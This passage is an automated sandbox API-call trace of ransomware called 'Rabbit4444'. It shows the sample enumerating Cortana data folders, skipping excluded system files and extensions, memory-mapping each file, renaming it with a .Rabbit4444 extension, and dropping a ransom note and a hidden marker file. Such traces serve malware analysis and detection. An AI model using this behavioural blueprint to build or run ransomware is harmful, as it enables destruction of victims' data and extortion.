"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.ft.rabbit4444"), dwFlags=0x1) returned 1 [0067.348] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c8819a, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x52c8819a, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x53362df6, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x821fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.index", cAlternateFileName="SETTIN~1.IND")) returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="Rabbit4444.exe") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2=".") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="..") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="windows") returned -1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="bootmgr") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="pagefile.sys") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="boot") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="ids.txt") returned 1 [0067.348] lstrcmpiW (lpString1="Settings.index", lpString2="NTUSER.DAT") returned 1 [0067.348] lstrcpyW (in: lpString1=0x130ec6c, lpString2="Settings.index" | out: lpString1="Settings.index") returned="Settings.index" [0067.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.index", dwFileAttributes=0x0) returned 1 [0067.348] lstrlenW (lpString="Settings.index") returned 14 [0067.349] lstrlenW (lpString="Rabbit4444") returned 10 [0067.349] lstrcmpiW (lpString1="ings.index", lpString2="Rabbit4444") returned -1 [0067.349] lstrlenW (lpString=".dll") returned 4 [0067.349] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0067.349] lstrlenW (lpString=".lnk") returned 4 [0067.349] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0067.349] lstrlenW (lpString=".ini") returned 4 [0067.349] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0067.349] lstrlenW (lpString=".sys") returned 4 [0067.349] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0067.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0067.349] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15865991605) returned 1 [0067.349] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=532987) returned 1 [0067.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0067.349] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x82500, lpName=0x0) returned 0x27c [0067.350] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x82500) returned 0x2b0000 [0067.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11dc80 [0067.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.367] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dc80 | out: hHeap=0xe0000) returned 1 [0067.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115390 [0067.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115390 | out: hHeap=0xe0000) returned 1 [0067.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.368] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15867837359) returned 1 [0067.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0067.368] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0067.372] CloseHandle (hObject=0x27c) returned 1 [0067.373] CloseHandle (hObject=0x260) returned 1 [0067.373] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.index.Rabbit4444") returned 179 [0067.373] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\Settings.index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\settings.index.rabbit4444"), dwFlags=0x1) returned 1 [0067.373] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c8819a, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x52c8819a, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x53362df6, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x821fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings.index", cAlternateFileName="SETTIN~1.IND")) returned 0 [0067.373] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0067.374] lstrcpyW (in: lpString1=0x130ec6c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.374] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\settings_{26159dcd-00b6-4881-a91c-092cd378d482}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.374] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0067.375] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.376] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.376] CloseHandle (hObject=0x260) returned 1 [0067.376] CloseHandle (hObject=0x228) returned 1 [0067.376] GetCurrentThreadId () returned 0xd98 [0067.376] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0067.376] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}" [0067.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.376] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0067.376] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}" [0067.376] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\" [0067.376] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\.BFC0E91B00AE8A0620D3" [0067.376] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.379] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.381] FlushFileBuffers (hFile=0x228) returned 1 [0067.382] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.383] CloseHandle (hObject=0x228) returned 1 [0067.383] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}") returned 150 [0067.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.383] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24d1109, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf17baa83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0067.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.383] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.383] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.383] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24d1109, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf17baa83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.383] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.383] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.383] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.384] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf17baa83, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf17baa83, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf17baa83, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.384] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.384] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.384] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88ca800, ftCreationTime.dwHighDateTime=0x1d196ec, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd88ca800, ftLastWriteTime.dwHighDateTime=0x1d196ec, nFileSizeHigh=0x0, nFileSizeLow=0x118, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="apps.csg", cAlternateFileName="")) returned 1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="Rabbit4444.exe") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2=".") returned 1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="..") returned 1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="windows") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="bootmgr") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="pagefile.sys") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="boot") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="ids.txt") returned -1 [0067.384] lstrcmpiW (lpString1="apps.csg", lpString2="NTUSER.DAT") returned -1 [0067.384] lstrcpyW (in: lpString1=0x130ec66, lpString2="apps.csg" | out: lpString1="apps.csg") returned="apps.csg" [0067.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg", dwFileAttributes=0x0) returned 1 [0067.385] lstrlenW (lpString="apps.csg") returned 8 [0067.385] lstrlenW (lpString="Rabbit4444") returned 10 [0067.385] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0067.385] lstrlenW (lpString=".dll") returned 4 [0067.385] lstrcmpiW (lpString1=".csg", lpString2=".dll") returned -1 [0067.385] lstrlenW (lpString=".lnk") returned 4 [0067.385] lstrcmpiW (lpString1=".csg", lpString2=".lnk") returned -1 [0067.385] lstrlenW (lpString=".ini") returned 4 [0067.385] lstrcmpiW (lpString1=".csg", lpString2=".ini") returned -1 [0067.385] lstrlenW (lpString=".sys") returned 4 [0067.385] lstrcmpiW (lpString1=".csg", lpString2=".sys") returned -1 [0067.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.386] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.386] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15869644203) returned 1 [0067.386] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=280) returned 1 [0067.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0067.386] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x29c [0067.388] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x70000 [0067.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.389] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15869950115) returned 1 [0067.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0067.389] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.389] CloseHandle (hObject=0x29c) returned 1 [0067.389] CloseHandle (hObject=0x280) returned 1 [0067.389] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg.Rabbit4444") returned 170 [0067.389] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.csg.rabbit4444"), dwFlags=0x1) returned 1 [0067.390] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a54f700, ftCreationTime.dwHighDateTime=0x1d19562, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x2a54f700, ftLastWriteTime.dwHighDateTime=0x1d19562, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="apps.schema", cAlternateFileName="APPS~1.SCH")) returned 1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="Rabbit4444.exe") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2=".") returned 1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="..") returned 1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="windows") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="bootmgr") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="pagefile.sys") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="boot") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="ids.txt") returned -1 [0067.390] lstrcmpiW (lpString1="apps.schema", lpString2="NTUSER.DAT") returned -1 [0067.390] lstrcpyW (in: lpString1=0x130ec66, lpString2="apps.schema" | out: lpString1="apps.schema") returned="apps.schema" [0067.390] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema", dwFileAttributes=0x0) returned 1 [0067.390] lstrlenW (lpString="apps.schema") returned 11 [0067.390] lstrlenW (lpString="Rabbit4444") returned 10 [0067.390] lstrcmpiW (lpString1="pps.schema", lpString2="Rabbit4444") returned -1 [0067.390] lstrlenW (lpString=".dll") returned 4 [0067.390] lstrcmpiW (lpString1="hema", lpString2=".dll") returned 1 [0067.391] lstrlenW (lpString=".lnk") returned 4 [0067.391] lstrcmpiW (lpString1="hema", lpString2=".lnk") returned 1 [0067.391] lstrlenW (lpString=".ini") returned 4 [0067.391] lstrcmpiW (lpString1="hema", lpString2=".ini") returned 1 [0067.391] lstrlenW (lpString=".sys") returned 4 [0067.391] lstrcmpiW (lpString1="hema", lpString2=".sys") returned 1 [0067.391] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.391] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.391] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15870181380) returned 1 [0067.391] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=150) returned 1 [0067.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0067.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0067.391] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x29c [0067.393] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x70000 [0067.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 